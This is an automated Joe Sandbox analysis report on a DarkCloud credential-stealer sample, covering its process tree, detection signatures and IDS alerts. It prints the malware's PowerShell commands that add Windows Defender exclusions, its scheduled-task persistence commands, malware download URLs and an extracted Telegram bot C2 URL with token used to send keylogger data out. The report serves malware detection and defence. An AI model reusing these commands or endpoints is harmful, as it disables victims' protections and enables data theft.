Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
g44YQtTyjN.exe

Overview

General Information

Sample name:g44YQtTyjN.exe
renamed because original name is a hash value
Original sample name:94213c6a04939eca937ffffb3f938a7dfc297cc20cd7d02d5a8a06b69d56dc79.exe
Analysis ID:1632386
MD5:a6ccb9255baee007cb4350101a2a8b2b
SHA1:ff666e71f6c4e071f7c836de86eccf73f9717f54
SHA256:94213c6a04939eca937ffffb3f938a7dfc297cc20cd7d02d5a8a06b69d56dc79
Tags:DarkCloudexeuser-adrian__luca
Infos:

Detection

DarkCloud
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkCloud
Yara detected Telegram RAT
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • g44YQtTyjN.exe (PID: 3036 cmdline: "C:\Users\user\Desktop\g44YQtTyjN.exe" MD5: A6CCB9255BAEE007CB4350101A2A8B2B)
    • powershell.exe (PID: 6828 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8588 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 8624 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp82D7.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 8736 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 8744 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 8760 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • ECmmsbHOaKPh.exe (PID: 8812 cmdline: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe MD5: A6CCB9255BAEE007CB4350101A2A8B2B)
    • schtasks.exe (PID: 9060 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp8B71.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 9068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 9112 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DarkCloud StealerStealer is written in Visual Basic.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendMessage", "Telegram Stream": [{"ok": true, "result": {"message_id": 220, "from": {"id": 7879240328, "is_bot": true, "first_name": "ugobest147", "username": "ugobest147bot"}, "chat": {"id": 2001212894, "first_name": "Joe", "last_name": "Joe", "type": "private"}, "date": 1741385698, "document": {"file_name": "KeyDataflSwUSqo.txt", "mime_type": "text/plain", "file_id": "BQACAgQAAxkDAAPcZ8tv4tmwdnKQ1gJiUYADxWiYVHIAAoMdAAKHvmBSmodpD4Bt-602BA", "file_unique_id": "AgADgx0AAoe-YFI", "file_size": 396}, "caption": "DC-KL:::user-PC\\user\\"}}, {"ok": true, "result": {"message_id": 217, "from": {"id": 7879240328, "is_bot": true, "first_name": "ugobest147", "username": "ugobest147bot"}, "chat": {"id": 2001212894, "first_name": "Joe", "last_name": "Joe", "type": "private"}, "date": 1741385693, "document": {"file_name": "KeyDatabcwuTujf.txt", "mime_type": "text/plain", "file_id": "BQACAgQAAxkDAAPZZ8tv3Zq9N7z202gKD7GgchhBXPEAAoAdAAKHvmBSJvNAnQvNUSE2BA", "file_unique_id": "AgADgB0AAoe-YFI", "file_size": 396}, "caption": "DC-KL:::user-PC\\user\\"}}, {"ok": true, "result": {"message_id": 215, "from": {"id": 7879240328, "is_bot": true, "first_name": "ugobest147", "username": "ugobest147bot"}, "chat": {"id": 2001212894, "first_name": "Joe", "last_name": "Joe", "type": "private"}, "date": 1741385691, "document": {"file_name": "KeyDatahOJefols.txt", "mime_type": "text/plain", "file_id": "BQACAgQAAxkDAAPXZ8tv21f1sYVl_AKEYdUEvQ4ROoAAAn4dAAKHvmBSvfbwtz5zpVQ2BA", "file_unique_id": "AgADfh0AAoe-YFI", "file_size": 363}, "caption": "DC-KL:::user-PC\\user\\"}}, {"ok": true, "result": {"message_id": 218, "from": {"id": 7879240328, "is_bot": true, "first_name": "ugobest147", "username": "ugobest147bot"}, "chat": {"id": 2001212894, "first_name": "Joe", "last_name": "Joe", "type": "private"}, "date": 1741385695, "document": {"file_name": "KeyDatajPmvaPVG.txt", "mime_type": "text/plain", "file_id": "BQACAgQAAxkDAAPaZ8tv3xWF8_G2x5SdqzDbXOwIRFgAAoEdAAKHvmBS-Qw2BR_HX882BA", "file_unique_id": "AgADgR0AAoe-YFI", "file_size": 363}, "caption": "DC-KL:::user-PC\\user\\"}}]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2559323570.000000000042B000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
    0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
      0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
          • 0x2dd84:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
          Click to see the 31 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          17.2.RegSvcs.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            0.2.g44YQtTyjN.exe.3d6cec8.0.raw.unpackJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
              0.2.g44YQtTyjN.exe.3d6cec8.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.g44YQtTyjN.exe.3d6cec8.0.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  12.2.RegSvcs.exe.403580.0.unpackJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
                    Click to see the 57 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\g44YQtTyjN.exe", ParentImage: C:\Users\user\Desktop\g44YQtTyjN.exe, ParentProcessId: 3036, ParentProcessName: g44YQtTyjN.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe", ProcessId: 6828, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\g44YQtTyjN.exe", ParentImage: C:\Users\user\Desktop\g44YQtTyjN.exe, ParentProcessId: 3036, ParentProcessName: g44YQtTyjN.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe", ProcessId: 6828, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp8B71.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp8B71.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe, ParentImage: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe, ParentProcessId: 8812, ParentProcessName: ECmmsbHOaKPh.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp8B71.tmp", ProcessId: 9060, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp82D7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp82D7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\g44YQtTyjN.exe", ParentImage: C:\Users\user\Desktop\g44YQtTyjN.exe, ParentProcessId: 3036, ParentProcessName: g44YQtTyjN.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp82D7.tmp", ProcessId: 8624, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\g44YQtTyjN.exe", ParentImage: C:\Users\user\Desktop\g44YQtTyjN.exe, ParentProcessId: 3036, ParentProcessName: g44YQtTyjN.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe", ProcessId: 6828, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp82D7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp82D7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\g44YQtTyjN.exe", ParentImage: C:\Users\user\Desktop\g44YQtTyjN.exe, ParentProcessId: 3036, ParentProcessName: g44YQtTyjN.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp82D7.tmp", ProcessId: 8624, ProcessName: schtasks.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-07T23:13:28.659495+010020453001A Network Trojan was detected192.168.2.549705149.154.167.220443TCP
                    2025-03-07T23:13:48.417026+010020453001A Network Trojan was detected192.168.2.549707149.154.167.220443TCP
                    2025-03-07T23:14:02.722868+010020453001A Network Trojan was detected192.168.2.549708149.154.167.220443TCP
                    2025-03-07T23:14:15.547445+010020453001A Network Trojan was detected192.168.2.549709149.154.167.220443TCP
                    2025-03-07T23:14:24.443469+010020453001A Network Trojan was detected192.168.2.549710149.154.167.220443TCP
                    2025-03-07T23:14:30.389704+010020453001A Network Trojan was detected192.168.2.549711149.154.167.220443TCP
                    2025-03-07T23:14:34.602753+010020453001A Network Trojan was detected192.168.2.549712149.154.167.220443TCP
                    2025-03-07T23:14:39.462754+010020453001A Network Trojan was detected192.168.2.549713149.154.167.220443TCP
                    2025-03-07T23:14:44.023967+010020453001A Network Trojan was detected192.168.2.549714149.154.167.220443TCP
                    2025-03-07T23:14:48.380560+010020453001A Network Trojan was detected192.168.2.549715149.154.167.220443TCP
                    2025-03-07T23:14:52.590344+010020453001A Network Trojan was detected192.168.2.549716149.154.167.220443TCP
                    2025-03-07T23:15:00.041323+010020453001A Network Trojan was detected192.168.2.549718149.154.167.220443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-07T23:13:27.973496+010028523881Malware Command and Control Activity Detected192.168.2.549705149.154.167.220443TCP
                    2025-03-07T23:13:47.761112+010028523881Malware Command and Control Activity Detected192.168.2.549707149.154.167.220443TCP
                    2025-03-07T23:14:01.892031+010028523881Malware Command and Control Activity Detected192.168.2.549708149.154.167.220443TCP
                    2025-03-07T23:14:14.823167+010028523881Malware Command and Control Activity Detected192.168.2.549709149.154.167.220443TCP
                    2025-03-07T23:14:23.732628+010028523881Malware Command and Control Activity Detected192.168.2.549710149.154.167.220443TCP
                    2025-03-07T23:14:29.601834+010028523881Malware Command and Control Activity Detected192.168.2.549711149.154.167.220443TCP
                    2025-03-07T23:14:33.880451+010028523881Malware Command and Control Activity Detected192.168.2.549712149.154.167.220443TCP
                    2025-03-07T23:14:38.783991+010028523881Malware Command and Control Activity Detected192.168.2.549713149.154.167.220443TCP
                    2025-03-07T23:14:43.313410+010028523881Malware Command and Control Activity Detected192.168.2.549714149.154.167.220443TCP
                    2025-03-07T23:14:47.655031+010028523881Malware Command and Control Activity Detected192.168.2.549715149.154.167.220443TCP
                    2025-03-07T23:14:51.837548+010028523881Malware Command and Control Activity Detected192.168.2.549716149.154.167.220443TCP
                    2025-03-07T23:14:55.710776+010028523881Malware Command and Control Activity Detected192.168.2.549717149.154.167.220443TCP
                    2025-03-07T23:14:59.252822+010028523881Malware Command and Control Activity Detected192.168.2.549718149.154.167.220443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-07T23:13:27.973496+010018100081Potentially Bad Traffic192.168.2.549705149.154.167.220443TCP
                    2025-03-07T23:13:47.761112+010018100081Potentially Bad Traffic192.168.2.549707149.154.167.220443TCP
                    2025-03-07T23:14:01.892031+010018100081Potentially Bad Traffic192.168.2.549708149.154.167.220443TCP
                    2025-03-07T23:14:14.823167+010018100081Potentially Bad Traffic192.168.2.549709149.154.167.220443TCP
                    2025-03-07T23:14:23.732628+010018100081Potentially Bad Traffic192.168.2.549710149.154.167.220443TCP
                    2025-03-07T23:14:29.601834+010018100081Potentially Bad Traffic192.168.2.549711149.154.167.220443TCP
                    2025-03-07T23:14:33.880451+010018100081Potentially Bad Traffic192.168.2.549712149.154.167.220443TCP
                    2025-03-07T23:14:38.783991+010018100081Potentially Bad Traffic192.168.2.549713149.154.167.220443TCP
                    2025-03-07T23:14:43.313410+010018100081Potentially Bad Traffic192.168.2.549714149.154.167.220443TCP
                    2025-03-07T23:14:47.655031+010018100081Potentially Bad Traffic192.168.2.549715149.154.167.220443TCP
                    2025-03-07T23:14:51.837548+010018100081Potentially Bad Traffic192.168.2.549716149.154.167.220443TCP
                    2025-03-07T23:14:55.710776+010018100081Potentially Bad Traffic192.168.2.549717149.154.167.220443TCP
                    2025-03-07T23:14:59.252822+010018100081Potentially Bad Traffic192.168.2.549718149.154.167.220443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: http://nfs.sa.comAvira URL Cloud: Label: malware
                    Source: https://nfs.sa.comAvira URL Cloud: Label: malware
                    Source: https://nfs.sa.com/nano/schvost.exeAvira URL Cloud: Label: malware
                    Found malware configuration
                    Source: RegSvcs.exe.8760.12.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendMessage", "Telegram Stream": [{"ok": true, "result": {"message_id": 220, "from": {"id": 7879240328, "is_bot": true, "first_name": "ugobest147", "username": "ugobest147bot"}, "chat": {"id": 2001212894, "first_name": "Joe", "last_name": "Joe", "type": "private"}, "date": 1741385698, "document": {"file_name": "KeyDataflSwUSqo.txt", "mime_type": "text/plain", "file_id": "BQACAgQAAxkDAAPcZ8tv4tmwdnKQ1gJiUYADxWiYVHIAAoMdAAKHvmBSmodpD4Bt-602BA", "file_unique_id": "AgADgx0AAoe-YFI", "file_size": 396}, "caption": "DC-KL:::user-PC\\user\\"}}, {"ok": true, "result": {"message_id": 217, "from": {"id": 7879240328, "is_bot": true, "first_name": "ugobest147", "username": "ugobest147bot"}, "chat": {"id": 2001212894, "first_name": "Joe", "last_name": "Joe", "type": "private"}, "date": 1741385693, "document": {"file_name": "KeyDatabcwuTujf.txt", "mime_type": "text/plain", "file_id": "BQACAgQAAxkDAAPZZ8tv3Zq9N7z202gKD7GgchhBXPEAAoAdAAKHvmBSJvNAnQvNUSE2BA", "file_unique_id": "AgADgB0AAoe-YFI", "file_size": 396}, "caption": "DC-KL:::user-PC\\user\\"}}, {"ok": true, "result": {"message_id": 215, "from": {"id": 7879240328, "is_bot": true, "first_name": "ugobest147", "username": "ugobest147bot"}, "chat": {"id": 2001212894, "first_name": "Joe", "last_name": "Joe", "type": "private"}, "date": 1741385691, "document": {"file_name": "KeyDatahOJefols.txt", "mime_type": "text/plain", "file_id": "BQACAgQAAxkDAAPXZ8tv21f1sYVl_AKEYdUEvQ4ROoAAAn4dAAKHvmBSvfbwtz5zpVQ2BA", "file_unique_id": "AgADfh0AAoe-YFI", "file_size": 363}, "caption": "DC-KL:::user-PC\\user\\"}}, {"ok": true, "result": {"message_id": 218, "from": {"id": 7879240328, "is_bot": true, "first_name": "ugobest147", "username": "ugobest147bot"}, "chat": {"id": 2001212894, "first_name": "Joe", "last_name": "Joe", "type": "private"}, "date": 1741385695, "document": {"file_name": "KeyDatajPmvaPVG.txt", "mime_type": "text/plain", "file_id": "BQACAgQAAxkDAAPaZ8tv3xWF8_G2x5SdqzDbXOwIRFgAAoEdAAKHvmBS-Qw2BR_HX882BA", "file_unique_id": "AgADgR0AAoe-YFI", "file_size": 363}, "caption": "DC-KL:::user-PC\\user\\"}}]}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeReversingLabs: Detection: 65%
                    Multi AV Scanner detection for submitted file
                    Source: g44YQtTyjN.exeVirustotal: Detection: 71%Perma Link
                    Source: g44YQtTyjN.exeReversingLabs: Detection: 65%
                    Joe Sandbox ML detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: g44YQtTyjN.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49707 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49715 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49716 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49717 version: TLS 1.2
                    Source: g44YQtTyjN.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: W.pdb4 source: g44YQtTyjN.exe, 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp, g44YQtTyjN.exe, 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.0000000004831000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.000000000477E000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: GCbd.pdbSHA256 source: g44YQtTyjN.exe, ECmmsbHOaKPh.exe.0.dr
                    Source: Binary string: GCbd.pdb source: g44YQtTyjN.exe, ECmmsbHOaKPh.exe.0.dr
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 4x nop then jmp 06C6D6B8h0_2_06C6CEB2
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 4x nop then jmp 06C6D6B8h0_2_06C6CECB
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeCode function: 4x nop then jmp 0570CF20h13_2_0570C71A
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeCode function: 4x nop then jmp 0570CF20h13_2_0570C733

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49705 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49709 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49709 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49709 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49713 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49713 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49715 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49708 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49708 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49705 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49710 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49710 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49717 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49715 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49717 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49707 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49712 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49707 -> 149.154.167.220:443
